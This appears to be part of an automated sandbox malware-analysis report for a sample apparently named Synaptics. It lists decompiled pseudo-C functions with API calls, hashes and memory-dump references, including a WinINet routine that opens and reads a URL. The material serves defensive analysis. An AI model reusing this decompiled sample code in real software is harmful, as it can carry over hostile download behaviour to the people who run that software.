                                                                                                                                                                                                                            • Opcode ID: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                                                            • Instruction ID: c8c9ae32e1ca622756d665ee7f261621c5687007f21876862268219cdbc985ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E318330B042449FE750FBA9DC42B9973A4EB44305F9440BABD08EB2D7DE78A949C729
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474FC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89networkfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                            			E00474FC0(void* __eax, void* __ebx, void* __edx, void* __esi) {
				void* _v8;
				void* _v12;
				long _v16;
				void _v1042;
				char _v1048;
				void* _t32;
				int _t40;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t62;
				void* _t63;
				intOrPtr _t64;

				_t62 = _t63;
				_t64 = _t63 + 0xfffffbec;
				_v1048 = 0;
				_t47 = __edx;
				_t60 = __eax;
				_push(_t62);
				_push(0x4750fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				E004049C0(__edx);
				_v8 = InternetOpenA("MyApp", 0, 0, 0, 0);
				_push(_t62);
				_push(0x4750db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				if(_v8 == 0) {
					L6:
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(E004750E2);
					return InternetCloseHandle(_v8);
				} else {
					_t32 = InternetOpenUrlA(_v8, E00404E80(_t60), 0, 0, 0x84000000, 0); // executed
					_v12 = _t32;
					if(_v12 == 0) {
						goto L6;
					} else {
						_push(_t62);
						_push(0x4750bd);
						_push( *[fs:eax]);
						 *[fs:eax] = _t64;
						while(1) {
							_v16 = 0x400;
							InternetReadFile(_v12,  &_v1042, 0x400,  &_v16); // executed
							if(_v16 == 0) {
								break;
							}
							 *((char*)(_t62 + _v16 - 0x40e)) = 0;
							E00404C30( &_v1048, 0x402,  &_v1042);
							E00404C88(_t47, _v1048);
						}
						_pop(_t56);
						 *[fs:eax] = _t56;
						_push(E004750C4);
						_t40 = InternetCloseHandle(_v12); // executed
						return _t40;
					}
				}
			}

















                                                                                                                                                                                                                            0x00474fc1
                                                                                                                                                                                                                            0x00474fc3
                                                                                                                                                                                                                            0x00474fcd
                                                                                                                                                                                                                            0x00474fd3
                                                                                                                                                                                                                            0x00474fd5
                                                                                                                                                                                                                            0x00474fd9
                                                                                                                                                                                                                            0x00474fda
                                                                                                                                                                                                                            0x00474fdf
                                                                                                                                                                                                                            0x00474fe2
                                                                                                                                                                                                                            0x00474fe7
                                                                                                                                                                                                                            0x00474ffe
                                                                                                                                                                                                                            0x00475003
                                                                                                                                                                                                                            0x00475004
                                                                                                                                                                                                                            0x00475009
                                                                                                                                                                                                                            0x0047500c
                                                                                                                                                                                                                            0x00475013
                                                                                                                                                                                                                            0x004750c4
                                                                                                                                                                                                                            0x004750c6
                                                                                                                                                                                                                            0x004750c9
                                                                                                                                                                                                                            0x004750cc
                                                                                                                                                                                                                            0x004750da
                                                                                                                                                                                                                            0x00475019
                                                                                                                                                                                                                            0x00475030
                                                                                                                                                                                                                            0x00475035
                                                                                                                                                                                                                            0x0047503c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00475042
                                                                                                                                                                                                                            0x00475044
                                                                                                                                                                                                                            0x00475045
                                                                                                                                                                                                                            0x0047504a
                                                                                                                                                                                                                            0x0047504d
                                                                                                                                                                                                                            0x00475050
                                                                                                                                                                                                                            0x00475050
                                                                                                                                                                                                                            0x0047506b
                                                                                                                                                                                                                            0x00475074
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00475079
                                                                                                                                                                                                                            0x00475092
                                                                                                                                                                                                                            0x0047509f
                                                                                                                                                                                                                            0x0047509f
                                                                                                                                                                                                                            0x004750a8
                                                                                                                                                                                                                            0x004750ab
                                                                                                                                                                                                                            0x004750ae
                                                                                                                                                                                                                            0x004750b7
                                                                                                                                                                                                                            0x004750bc
                                                                                                                                                                                                                            0x004750bc
                                                                                                                                                                                                                            0x0047503c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004750D5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                                            • String ID: MyApp
                                                                                                                                                                                                                            • API String ID: 3121278467-2115267534
                                                                                                                                                                                                                            • Opcode ID: 0ddd16eab12d4d076789ab758048c61251c9022f90b699c7751c9190b1dbe1f3
                                                                                                                                                                                                                            • Instruction ID: 49772c5e95778878b0e4af45138c7482376825189897ce4c7807679e07b59e25
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ddd16eab12d4d076789ab758048c61251c9022f90b699c7751c9190b1dbe1f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C31A7B1A04748ABE711DBA5DC12BDA77BCE748704F6184BAB704E76C0D6BC5940CA5C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00422C88 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00422C88(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HWND__* _t15;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x49e668; // 0x400000
				 *0x49b5dc = _t6;
				_t8 =  *0x49b5f0; // 0x422c78
				_t9 =  *0x49e668; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00407540 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x49e668; // 0x400000
						_t20 =  *0x49b5f0; // 0x422c78
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x49b5cc);
				}
				_t13 =  *0x49e668; // 0x400000
				_t24 =  *0x49b5f0; // 0x422c78
				_t15 = E00407A8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
				_t22 = _t15;
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E00422BCC(_a4, _a8));
				}
				return _t22;
			}















                                                                                                                                                                                                                            0x00422c8f
                                                                                                                                                                                                                            0x00422c94
                                                                                                                                                                                                                            0x00422c9d
                                                                                                                                                                                                                            0x00422ca3
                                                                                                                                                                                                                            0x00422ca9
                                                                                                                                                                                                                            0x00422cb1
                                                                                                                                                                                                                            0x00422cb3
                                                                                                                                                                                                                            0x00422cb6
                                                                                                                                                                                                                            0x00422cc4
                                                                                                                                                                                                                            0x00422cc6
                                                                                                                                                                                                                            0x00422ccc
                                                                                                                                                                                                                            0x00422cd2
                                                                                                                                                                                                                            0x00422cd2
                                                                                                                                                                                                                            0x00422cdc
                                                                                                                                                                                                                            0x00422cdc
                                                                                                                                                                                                                            0x00422cf2
                                                                                                                                                                                                                            0x00422cff
                                                                                                                                                                                                                            0x00422d0a
                                                                                                                                                                                                                            0x00422d0f
                                                                                                                                                                                                                            0x00422d16
                                                                                                                                                                                                                            0x00422d27
                                                                                                                                                                                                                            0x00422d27
                                                                                                                                                                                                                            0x00422d32

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                                                                                            • String ID: TPUtilWindow$x,B
                                                                                                                                                                                                                            • API String ID: 4025006896-1057714546
                                                                                                                                                                                                                            • Opcode ID: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                                                            • Instruction ID: 5edbcaf682720338496e3359f8b598ec737c219f81609156ea6670bddb9c1a51
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0018E71744204BBDB00EB6AED81F9A7399EB28718F544137F904E73A1D679AC40CBAD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00437D70 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00437D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x49bc20; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x49bc20; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb26 & 0x0000ffff, _t27);
				_t31 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb24 & 0x0000ffff, _t31);
				_t35 =  *0x49bc20; // 0x0
				 *0x49bc20 = 0; // executed
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                                                                                                                                                                                                            0x00437d75
                                                                                                                                                                                                                            0x00437d78
                                                                                                                                                                                                                            0x00437d80
                                                                                                                                                                                                                            0x00437d86
                                                                                                                                                                                                                            0x00437d98
                                                                                                                                                                                                                            0x00437dad
                                                                                                                                                                                                                            0x00437dc8
                                                                                                                                                                                                                            0x00437dc8
                                                                                                                                                                                                                            0x00437dcd
                                                                                                                                                                                                                            0x00437ddf
                                                                                                                                                                                                                            0x00437de4
                                                                                                                                                                                                                            0x00437df6
                                                                                                                                                                                                                            0x00437e07
                                                                                                                                                                                                                            0x00437e0c
                                                                                                                                                                                                                            0x00437e1c
                                                                                                                                                                                                                            0x00437e24

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00437D98
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00437DA3
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00437DB5
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00437DC8
                                                                                                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 00437DDF
                                                                                                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 00437DF6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LongWindow$Prop
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3887896539-0
                                                                                                                                                                                                                            • Opcode ID: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                                                            • Instruction ID: b5f16ed505960de4fc23b1fb6768328cc78d5017c86fd9e1eb6bf423726d3339
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0111CCB5504208BFDB10DF9DDD84EAA37E8EB1C354F10462AF914DB2A1DB34E9409BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00457FC8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E00457FC8(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403F10(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E00421B3C(_t63, 0);
				_t28 =  *0x49d878; // 0x49b510
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x45836c;
				_t29 =  *0x49d888; // 0x49b518
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x458378;
				E00458384(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E00403BBC(1);
				_t42 = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00407638();
				_t75 = _t42;
				L00407380();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00407888();
				_t11 = _t62 + 0x58; // 0x45122c6e
				_t45 =  *0x49dae4; // 0x49e91c
				 *((intOrPtr*)( *_t45))(0, 0, E004547A0,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E00424C3C(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E00424C3C(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E00424C3C(1);
				E004587A4(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x458680;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x458680;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x458680;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403F68(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























                                                                                                                                                                                                                            0x00457fc8
                                                                                                                                                                                                                            0x00457fc8
                                                                                                                                                                                                                            0x00457fd0
                                                                                                                                                                                                                            0x00457fd2
                                                                                                                                                                                                                            0x00457fd5
                                                                                                                                                                                                                            0x00457fd5
                                                                                                                                                                                                                            0x00457fda
                                                                                                                                                                                                                            0x00457fdd
                                                                                                                                                                                                                            0x00457fe3
                                                                                                                                                                                                                            0x00457fe8
                                                                                                                                                                                                                            0x00457fed
                                                                                                                                                                                                                            0x00457ff0
                                                                                                                                                                                                                            0x00457ff6
                                                                                                                                                                                                                            0x00457ffb
                                                                                                                                                                                                                            0x00457ffe
                                                                                                                                                                                                                            0x00458006
                                                                                                                                                                                                                            0x00458012
                                                                                                                                                                                                                            0x00458021
                                                                                                                                                                                                                            0x00458030
                                                                                                                                                                                                                            0x0045803f
                                                                                                                                                                                                                            0x0045804e
                                                                                                                                                                                                                            0x00458058
                                                                                                                                                                                                                            0x0045805d
                                                                                                                                                                                                                            0x00458062
                                                                                                                                                                                                                            0x00458067
                                                                                                                                                                                                                            0x0045806c
                                                                                                                                                                                                                            0x00458071
                                                                                                                                                                                                                            0x00458077
                                                                                                                                                                                                                            0x0045807c
                                                                                                                                                                                                                            0x0045808a
                                                                                                                                                                                                                            0x00458091
                                                                                                                                                                                                                            0x0045809f
                                                                                                                                                                                                                            0x004580b1
                                                                                                                                                                                                                            0x004580c3
                                                                                                                                                                                                                            0x004580cb
                                                                                                                                                                                                                            0x004580d0
                                                                                                                                                                                                                            0x004580d0
                                                                                                                                                                                                                            0x004580d6
                                                                                                                                                                                                                            0x004580d9
                                                                                                                                                                                                                            0x004580e0
                                                                                                                                                                                                                            0x004580e0
                                                                                                                                                                                                                            0x004580e6
                                                                                                                                                                                                                            0x004580e9
                                                                                                                                                                                                                            0x004580f0
                                                                                                                                                                                                                            0x004580f0
                                                                                                                                                                                                                            0x004580f6
                                                                                                                                                                                                                            0x004580f9
                                                                                                                                                                                                                            0x00458100
                                                                                                                                                                                                                            0x00458106
                                                                                                                                                                                                                            0x00458108
                                                                                                                                                                                                                            0x0045810d
                                                                                                                                                                                                                            0x00458114
                                                                                                                                                                                                                            0x0045811d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 0045800D
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000), ref: 00458077
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380KeyboardLayout
                                                                                                                                                                                                                            • String ID: 5B
                                                                                                                                                                                                                            • API String ID: 648844651-3738334870
                                                                                                                                                                                                                            • Opcode ID: f06d595c3e901a103d749baf538f62a4559fae39f106d35ce0652e1a7ae61c8d
                                                                                                                                                                                                                            • Instruction ID: 7c78f0e896318b154a236a51f14d482704da40fbffa7cbfd833c934430294294
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f06d595c3e901a103d749baf538f62a4559fae39f106d35ce0652e1a7ae61c8d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2331EA706052049FD740EF2AD8C1B497BE5FB05319F4480BEEC08DF367DA7AA9498B59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401A9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00401A9C() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push("\xef\xbf\xb				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x49e5cc);
				L004013F0();
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L004013F8();
				}
				E00401460(0x49e5ec);
				E00401460(0x49e5fc);
				E00401460(0x49e628);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x49e624 = _t11;
				if( *0x49e624 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49e624; // 0x6524a8
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x49e610)) = 0x49e60c;
					 *0x49e60c = 0x49e60c;
					 *0x49e618 = 0x49e60c;
					 *0x49e5c4 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B59);
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L00401400();
					return 0;
				}
				return 0;
			}








                                                                                                                                                                                                                            0x00401aa1
                                                                                                                                                                                                                            0x00401aa2
                                                                                                                                                                                                                            0x00401aa7
                                                                                                                                                                                                                            0x00401aaa
                                                                                                                                                                                                                            0x00401aad
                                                                                                                                                                                                                            0x00401ab2
                                                                                                                                                                                                                            0x00401abe
                                                                                                                                                                                                                            0x00401ac0
                                                                                                                                                                                                                            0x00401ac5
                                                                                                                                                                                                                            0x00401ac5
                                                                                                                                                                                                                            0x00401acf
                                                                                                                                                                                                                            0x00401ad9
                                                                                                                                                                                                                            0x00401ae3
                                                                                                                                                                                                                            0x00401aef
                                                                                                                                                                                                                            0x00401af4
                                                                                                                                                                                                                            0x00401b00
                                                                                                                                                                                                                            0x00401b02
                                                                                                                                                                                                                            0x00401b07
                                                                                                                                                                                                                            0x00401b07
                                                                                                                                                                                                                            0x00401b0f
                                                                                                                                                                                                                            0x00401b13
                                                                                                                                                                                                                            0x00401b14
                                                                                                                                                                                                                            0x00401b20
                                                                                                                                                                                                                            0x00401b23
                                                                                                                                                                                                                            0x00401b25
                                                                                                                                                                                                                            0x00401b2a
                                                                                                                                                                                                                            0x00401b2a
                                                                                                                                                                                                                            0x00401b33
                                                                                                                                                                                                                            0x00401b36
                                                                                                                                                                                                                            0x00401b39
                                                                                                                                                                                                                            0x00401b45
                                                                                                                                                                                                                            0x00401b47
                                                                                                                                                                                                                            0x00401b4c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401b4c
                                                                                                                                                                                                                            0x00401b51

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                            • API String ID: 730355536-3744524632
                                                                                                                                                                                                                            • Opcode ID: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                                                            • Instruction ID: dfc13510ffc652cdc4745fa131ecd9d2d70f716ade9f6bddb0b8d8da957d249b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201AD70204240AEE716EB6B9816B153BD4D76970CF85807FF000A77F2E6BC6840CA1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004534EC Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E004534EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_v8 = __eax;
				E0043DF9C(_v8);
				_push(_t203);
				_push(0x453742);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x49e665; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E0043D6F8(_v8, 0, __edx, _t204); // executed
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E0043A998(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0043A9DC(_v8, _t100, _t214);
					}
					_t180 =  *0x453750; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E00452B4C(_v8, 1, 1);
						E004411C8(_v8, 1, 1, _t215);
					}
					E0043C130(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
